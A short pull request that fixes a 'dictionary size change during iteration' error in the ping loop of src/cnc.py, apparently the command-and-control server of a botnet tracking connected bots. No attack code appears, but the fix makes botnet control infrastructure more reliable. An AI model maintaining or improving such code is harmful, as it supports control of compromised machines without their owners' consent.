### PR TITLE
Fixed ping function

### DIFF
--- a/src/cnc.py
+++ b/src/cnc.py
@@ -175,7 +175,7 @@ def loading(client):
 def ping():
     while 1:
         dead_bots = []
-        for bot in bots.keys():
+        for bot in bots.copy().keys():
             try:
                 bot.settimeout(3)
                 send(bot, 'PING', False, False)


### PR DESCRIPTION
Fixed the 'dictionary size change during iteration' error, which can occur when a lot of bots connect simultaneously, by creating a copy of the bots list and iterating over it instead.  
This way we are iterating over a fixed set of keys, preventing the error.